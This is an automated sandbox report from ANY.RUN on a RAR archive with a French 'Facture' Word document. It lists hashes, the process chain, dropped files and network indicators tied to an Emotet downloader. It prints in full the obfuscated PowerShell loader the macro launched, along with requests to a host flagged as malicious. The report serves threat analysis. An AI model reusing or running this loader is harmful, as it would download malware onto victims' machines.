analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Muestra.rar

Full analysis: https://app.any.run/tasks/d30cc445-8615-4761-8052-04cea330d361
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: November 14, 2018, 16:38:54
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
maldoc-1
Indicators:
MIME: application/x-rar
File info: RAR archive data, v4, os: Win32
MD5:

7D68846A00ED0860F9F875FCA830FCE5

SHA1:

75BFCB47F38BC775885B69D0205A6B11B8EDFEDE

SHA256:

CD32B864DA96A08A8711A928FD738588EB8CCB0EB5E56FA55A820533022FEA43

SSDEEP:

768:c3wv0xQAGP57XoyZqe82NpZlPXwCWy4IHr9QpNlWQf+cuJayg3TOQrkPwZ:qwvMIRXoI382NpvPA1nIHr9QXl0BIFTF

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 1304)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 1304)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3352)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 3320)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • WinRAR.exe (PID: 2788)
    • Starts CMD.EXE for commands execution

      • CMD.exe (PID: 2828)
    • Creates files in the user directory

      • powershell.exe (PID: 3320)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1304)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1304)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v-4.x) (58.3)
.rar | RAR compressed archive (gen) (41.6)

EXIF

ZIP

CompressedSize: 49068
UncompressedSize: 93952
OperatingSystem: Win32
ModifyDate: 2018:11:14 09:28:20
PackingMethod: Normal
ArchivedFileName: Facture_Num_1EE6571499.doc
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
5
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2788"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Muestra.rar"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
1304"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb2788.6387\Facture_Num_1EE6571499.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2828CMD /c C:\wInDows\SysTem32\CMD.ExE /c "SeT FKS=$60hXi= " ) )421]rAHC[,)87]rAHC[+901]rAHC[+05]rAHC[( ecAlPer- 63]rAHC[,)98]rAHC[+501]rAHC[+05]rAHC[(EcAlpERC- 93]rAHC[,)09]rAHC[+97]rAHC[+001]rAHC[(EcAlpERC- 43]rAHC[,)05]rAHC[+221]rAHC[+78]rAHC[( EcAlpERC- )') ) ] ) h'+'TgNEL.Eo50muYi2( -..1 - [Eo50muYi2,ZOdZOd (NIOj::]GNirTs[ ( )ZOdZOdniOj-]52,62,4[cEPSmoc:VNEYi2 '+'( ^& ;2zW. ( Yi2psHOmE[21]+Yi2PShOME[30]+ZOdXZOd) ((ZOd ZOd+ZOd^& (ZOd+ZOd ZOd+ZOd([StRZOd+ZOdING'+']M6ZOd+ZOdaZOd+ZOdVZOd+ZOdErbZOd+ZOdOSZOd+ZOdePRefEZOd+ZOdreNZOd+ZOdcZOd+ZOdE)[1,ZOd+ZOd3]ZOd+ZO'+'d+sw3xsZOd'+'+ZOdw3-JZOd+ZOdOZOd+ZOdiZOd+ZOdnsZOd+ZOdw3sw3)'+' ZOd'+'+ZOd( NEZOd+ZOdw-oZOd+ZOdbJEcTZOd+ZOd SysZOd+ZOdTeZOd+ZOdm.iOZO'+'d+ZOd'+'.CZOd+ZOdoZOd+ZO'+'dMPZOd+ZOdReSsI'+'oNZOd+ZOd.ZOd+ZOddEFLZOd+ZOdAtZOd+ZOdeZOd+Z'+'O'+'dSTRZ'+'Od+ZOdE'+'AZOd+ZOdm( ZOd+ZOd[SySZOd+ZOdtEZOd+ZOdm.iZOd+ZOdo'+'.MEmoZOd'+'+ZOdrysZOd+ZO'+'dtReAM][cZOd+ZOdonVERt]ZOd+ZOd:ZOd+ZOd:ZOd+ZOdfZOd+Z'+'OdrZOd+'+'ZOdo'+'ZOd+ZOdMbZO'+'d+ZOdaZOd+ZOdsE64ZOd+ZOdstZOd+ZOdRIZOd+ZOdng( sw3RZBdZOd+ZOdS8MwFIZOd+ZOdb/S'+'ZOd+ZOdi4C2ZZOd+ZOdhLL6R'+'OFgpZOd+ZOdT52ZOd+'+'ZOdBWN1HcFLxJ06NNZOd+ZOdm49a0nal9L/ZOd+ZOdbFZOd+ZOdoeZOd+ZOd35ZOd+ZOd3nZOd+ZOdfZOd+ZOdB9ZOd+ZOd6ZOd+'+'ZOdDZOd+ZOdo/QZOd+ZOdQGKjZOd'+'+ZOdnNkpBO'+'ZOd+ZOdLZOd+ZOdQZOd+ZOdDZOd+ZOdRZOd+ZOd48ZOd+ZOdQ3SkZOd+ZOdJxjGss9uAJM7lS8'+'/ZOd+ZOdT0sQJz6iw2rvZOd'+'+ZOdRZOd+ZOduvLZOd+ZOd3ZOd+ZOd4eoPZOd+ZOdFVZOd+ZOdzZOd+ZOdxgZOd+ZOdhal9ZOd+ZOd1xyCZOd+ZOd'+'TZOd+ZOd7331b/JekKZOd+ZOdWeqZOd+ZOdx9hZOd+ZOdSu3ZOd+ZOd4/5ZOd+Z'+'Odd23OuLZOd+ZOd'+'KKu4RLxZOd+ZOdU08JZOd+ZOdvbHMo2azZOd+ZOdZknZOd+ZOdVmZOd+ZOdTQLZOd+ZOdCZOd+ZOd4'+'H93rxsSvva0ZO'+'d+ZOdJZOd+ZOd'+'f'+'cZOd+ZOdyZOd+ZOdXdZOd+ZOdhZOd+ZOdKzZOd+ZOdIlZOd+ZOdOZOd+ZOdGHF4'+'ZOd+ZOd0'+'ZOd+ZOdCRK4XV4ThM'+'ZOd+ZOdDZO'+'d+ZOdwZOd+ZOdEGZOd+ZOdEy1dKDzGfkkZOd+ZO'+'ds4HPCIUZOd+ZOdTEZOd+ZOdPZZOd+ZOdlZOd+ZOdC+AimWDx+ZOd+ZOdIOk'+'QcZOd+ZO'+'dO4ZOd+ZOdaeu'+'KpsZOd+ZOdX9EZOd+ZOd+ja1kZZHZOd+ZOdm+kgjFzgQbhlZOd+ZOdG1NZTZOd+ZOdOZOd+ZOdYb3vpeGFR78lYJ7gTZOd+ZOdSdZOd+ZOdt1'+'Z'+'Od+ZO'+'dvZOd+ZOdw==ZO'+'d+ZOds'+'wZOd+ZOd'+'3),ZOd+ZOd[sYstEZOd+ZOdm.iZOd+ZOdO.ZOd+ZOdcZOd+ZOdOmPrESsZOd'+'+ZOdiOZ'+'Od+'+'ZOdN.'+'CZOd+ZOdOMPRESSZO'+'d+ZOdIoZOd+ZOdnMZOd+ZOdODE]::DecoZOd+ZOdmPRESZOd+ZOds )ZOd+ZOd MkZOd+ZOdJ fOrZOd+ZOdeacZOd+ZOdHZOd+ZOd { NZOd+ZOdEwZOd+ZOd-ZOd'+'+ZOdobJEcT ZOd+ZOd'+' sysTeM.io.stREamZOd+ZOd'+'re'+'ADZO'+'d+ZOdErZOd+ZOd(M6aZOd+ZOd_ ,[sYZOd+ZOdsZOd+ZOdteZOd+ZOdm.ZOd+ZOdTZOd+ZOdeZOd+Z'+'OdxT.ZOd+ZOd'+'eNZOd+ZOdcodiNZOd+ZOdG]::AscZOd+ZOdiiZOd+ZOd )}).RZOd+ZOdEaDZOd+ZOdtOeZOd+ZOd'+'nd(ZOd+ZOd) ZOd).REPlaC'+'e(ZOdMkJZOd,ZOdNm2ZOd).REPlaCe(ZOdsw3ZOd,[stRiNG][cHAR]39).REPlaCe(([c'+'HAR]77+[cHAR'+']54+[cHAR]97),ZOdYi2ZOd)) 2zW=Eo50muYi2'(( ()''nIoj-]52,62,4[CEpsmoc:VNe$ ( ^& "; ^& ( $PShomE[4]+$PShomE[34]+'x')([STRiNg]::joiN('' ,(gET-VAriabLE 60HxI).ValUE[- 1.. - ((gET-VAriabLE 60HxI).ValUE.leNGTh) ]) )&& PoweRsHeLl ^&( 'SV' ) 1zqoH ( [type](\"{0}{2}{1}\"-f 'eNviR','NMENT','o') ) ;( ( ^& ( 'gi' ) varIAble:1ZQOH).\"Va`lUE\"::( \"{2}{5}{1}{4}{3}{6}{0}\" -f 'ABle','nmE','g','VaR','nt','ETeNViro','I' ).Invoke('FKs',(\"{0}{1}\"-f 'PrOCES','S' ))) ^| .( ( .( \"{2}{1}{0}\" -f'E','l','vAriAb') (\"{0}{1}\" -f '*mDr','*' )).\"NA`ME\"[3,11,2]-jOIN'' )" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3352C:\wInDows\SysTem32\CMD.ExE /c "SeT FKS=$60hXi= " ) )421]rAHC[,)87]rAHC[+901]rAHC[+05]rAHC[( ecAlPer- 63]rAHC[,)98]rAHC[+501]rAHC[+05]rAHC[(EcAlpERC- 93]rAHC[,)09]rAHC[+97]rAHC[+001]rAHC[(EcAlpERC- 43]rAHC[,)05]rAHC[+221]rAHC[+78]rAHC[( EcAlpERC- )') ) ] ) h'+'TgNEL.Eo50muYi2( -..1 - [Eo50muYi2,ZOdZOd (NIOj::]GNirTs[ ( )ZOdZOdniOj-]52,62,4[cEPSmoc:VNEYi2 '+'( & ;2zW. ( Yi2psHOmE[21]+Yi2PShOME[30]+ZOdXZOd) ((ZOd ZOd+ZOd& (ZOd+ZOd ZOd+ZOd([StRZOd+ZOdING'+']M6ZOd+ZOdaZOd+ZOdVZOd+ZOdErbZOd+ZOdOSZOd+ZOdePRefEZOd+ZOdreNZOd+ZOdcZOd+ZOdE)[1,ZOd+ZOd3]ZOd+ZO'+'d+sw3xsZOd'+'+ZOdw3-JZOd+ZOdOZOd+ZOdiZOd+ZOdnsZOd+ZOdw3sw3)'+' ZOd'+'+ZOd( NEZOd+ZOdw-oZOd+ZOdbJEcTZOd+ZOd SysZOd+ZOdTeZOd+ZOdm.iOZO'+'d+ZOd'+'.CZOd+ZOdoZOd+ZO'+'dMPZOd+ZOdReSsI'+'oNZOd+ZOd.ZOd+ZOddEFLZOd+ZOdAtZOd+ZOdeZOd+Z'+'O'+'dSTRZ'+'Od+ZOdE'+'AZOd+ZOdm( ZOd+ZOd[SySZOd+ZOdtEZOd+ZOdm.iZOd+ZOdo'+'.MEmoZOd'+'+ZOdrysZOd+ZO'+'dtReAM][cZOd+ZOdonVERt]ZOd+ZOd:ZOd+ZOd:ZOd+ZOdfZOd+Z'+'OdrZOd+'+'ZOdo'+'ZOd+ZOdMbZO'+'d+ZOdaZOd+ZOdsE64ZOd+ZOdstZOd+ZOdRIZOd+ZOdng( sw3RZBdZOd+ZOdS8MwFIZOd+ZOdb/S'+'ZOd+ZOdi4C2ZZOd+ZOdhLL6R'+'OFgpZOd+ZOdT52ZOd+'+'ZOdBWN1HcFLxJ06NNZOd+ZOdm49a0nal9L/ZOd+ZOdbFZOd+ZOdoeZOd+ZOd35ZOd+ZOd3nZOd+ZOdfZOd+ZOdB9ZOd+ZOd6ZOd+'+'ZOdDZOd+ZOdo/QZOd+ZOdQGKjZOd'+'+ZOdnNkpBO'+'ZOd+ZOdLZOd+ZOdQZOd+ZOdDZOd+ZOdRZOd+ZOd48ZOd+ZOdQ3SkZOd+ZOdJxjGss9uAJM7lS8'+'/ZOd+ZOdT0sQJz6iw2rvZOd'+'+ZOdRZOd+ZOduvLZOd+ZOd3ZOd+ZOd4eoPZOd+ZOdFVZOd+ZOdzZOd+ZOdxgZOd+ZOdhal9ZOd+ZOd1xyCZOd+ZOd'+'TZOd+ZOd7331b/JekKZOd+ZOdWeqZOd+ZOdx9hZOd+ZOdSu3ZOd+ZOd4/5ZOd+Z'+'Odd23OuLZOd+ZOd'+'KKu4RLxZOd+ZOdU08JZOd+ZOdvbHMo2azZOd+ZOdZknZOd+ZOdVmZOd+ZOdTQLZOd+ZOdCZOd+ZOd4'+'H93rxsSvva0ZO'+'d+ZOdJZOd+ZOd'+'f'+'cZOd+ZOdyZOd+ZOdXdZOd+ZOdhZOd+ZOdKzZOd+ZOdIlZOd+ZOdOZOd+ZOdGHF4'+'ZOd+ZOd0'+'ZOd+ZOdCRK4XV4ThM'+'ZOd+ZOdDZO'+'d+ZOdwZOd+ZOdEGZOd+ZOdEy1dKDzGfkkZOd+ZO'+'ds4HPCIUZOd+ZOdTEZOd+ZOdPZZOd+ZOdlZOd+ZOdC+AimWDx+ZOd+ZOdIOk'+'QcZOd+ZO'+'dO4ZOd+ZOdaeu'+'KpsZOd+ZOdX9EZOd+ZOd+ja1kZZHZOd+ZOdm+kgjFzgQbhlZOd+ZOdG1NZTZOd+ZOdOZOd+ZOdYb3vpeGFR78lYJ7gTZOd+ZOdSdZOd+ZOdt1'+'Z'+'Od+ZO'+'dvZOd+ZOdw==ZO'+'d+ZOds'+'wZOd+ZOd'+'3),ZOd+ZOd[sYstEZOd+ZOdm.iZOd+ZOdO.ZOd+ZOdcZOd+ZOdOmPrESsZOd'+'+ZOdiOZ'+'Od+'+'ZOdN.'+'CZOd+ZOdOMPRESSZO'+'d+ZOdIoZOd+ZOdnMZOd+ZOdODE]::DecoZOd+ZOdmPRESZOd+ZOds )ZOd+ZOd MkZOd+ZOdJ fOrZOd+ZOdeacZOd+ZOdHZOd+ZOd { NZOd+ZOdEwZOd+ZOd-ZOd'+'+ZOdobJEcT ZOd+ZOd'+' sysTeM.io.stREamZOd+ZOd'+'re'+'ADZO'+'d+ZOdErZOd+ZOd(M6aZOd+ZOd_ ,[sYZOd+ZOdsZOd+ZOdteZOd+ZOdm.ZOd+ZOdTZOd+ZOdeZOd+Z'+'OdxT.ZOd+ZOd'+'eNZOd+ZOdcodiNZOd+ZOdG]::AscZOd+ZOdiiZOd+ZOd )}).RZOd+ZOdEaDZOd+ZOdtOeZOd+ZOd'+'nd(ZOd+ZOd) ZOd).REPlaC'+'e(ZOdMkJZOd,ZOdNm2ZOd).REPlaCe(ZOdsw3ZOd,[stRiNG][cHAR]39).REPlaCe(([c'+'HAR]77+[cHAR'+']54+[cHAR]97),ZOdYi2ZOd)) 2zW=Eo50muYi2'(( ()''nIoj-]52,62,4[CEpsmoc:VNe$ ( & "; ^& ( $PShomE[4]+$PShomE[34]+'x')([STRiNg]::joiN('' ,(gET-VAriabLE 60HxI).ValUE[- 1.. - ((gET-VAriabLE 60HxI).ValUE.leNGTh) ]) )&& PoweRsHeLl ^&( 'SV' ) 1zqoH ( [type](\"{0}{2}{1}\"-f 'eNviR','NMENT','o') ) ;( ( ^& ( 'gi' ) varIAble:1ZQOH).\"Va`lUE\"::( \"{2}{5}{1}{4}{3}{6}{0}\" -f 'ABle','nmE','g','VaR','nt','ETeNViro','I' ).Invoke('FKs',(\"{0}{1}\"-f 'PrOCES','S' ))) ^| .( ( .( \"{2}{1}{0}\" -f'E','l','vAriAb') (\"{0}{1}\" -f '*mDr','*' )).\"NA`ME\"[3,11,2]-jOIN'' )"C:\wInDows\SysTem32\cmd.exeCMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3320PoweRsHeLl &( 'SV' ) 1zqoH ( [type](\"{0}{2}{1}\"-f 'eNviR','NMENT','o') ) ;( ( & ( 'gi' ) varIAble:1ZQOH).\"Va`lUE\"::( \"{2}{5}{1}{4}{3}{6}{0}\" -f 'ABle','nmE','g','VaR','nt','ETeNViro','I' ).Invoke('FKs',(\"{0}{1}\"-f 'PrOCES','S' ))) | .( ( .( \"{2}{1}{0}\" -f'E','l','vAriAb') (\"{0}{1}\" -f '*mDr','*' )).\"NA`ME\"[3,11,2]-jOIN'' )C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 970
Read events
1 542
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
5
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
1304WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRC29F.tmp.cvr
MD5:
SHA256:
3320powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U1R8TG4H21C33TWU66SJ.temp
MD5:
SHA256:
1304WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Rar$DIb2788.6387\~WRD0000.tmp
MD5:
SHA256:
1304WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF1CB79C765CC78118.TMP
MD5:
SHA256:
1304WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:624E94C43DB108A79156FABFDA5056EF
SHA256:AA52C86192E8DDDE4E8AB223469820D95CBF6440CEE0C88A307B9C5EE61CDC39
1304WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Rar$DIb2788.6387\~WRL0001.tmpdocument
MD5:9711FE415CB20D12BB6C022DC270411E
SHA256:C01F5C817FBF1DCD990A74FFE57E534C4E004768F0CA166419C485AC28C4359B
2788WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIb2788.6387\Facture_Num_1EE6571499.docdocument
MD5:9711FE415CB20D12BB6C022DC270411E
SHA256:C01F5C817FBF1DCD990A74FFE57E534C4E004768F0CA166419C485AC28C4359B
3320powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5dced4.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
1304WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Rar$DIb2788.6387\Facture_Num_1EE6571499.docdocument
MD5:A92E615082F0A9E87234586805C11637
SHA256:E2F543AFB8C2B815B089103AA23B3C781FCBDE66B2FE5EC1FC7AC3D4A21244C2
1304WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Rar$DIb2788.6387\~$cture_Num_1EE6571499.docpgc
MD5:822A7CCE6E996CB9E8CC99895F6E1A03
SHA256:5715A3187CF253D4C7CBFCE4D62A23449543F7B7D78C27A003CC136BFAC7B535
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3320
powershell.exe
GET
13.84.151.151:80
http://mindhak.com/Ammv5OK/
US
malicious
3320
powershell.exe
GET
301
13.84.151.151:80
http://mindhak.com/Ammv5OK
US
html
235 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3320
powershell.exe
13.84.151.151:80
mindhak.com
Microsoft Corporation
US
malicious

DNS requests

Domain
IP
Reputation
mindhak.com
  • 13.84.151.151
malicious

Threats

PID
Process
Class
Message
3320
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
No debug info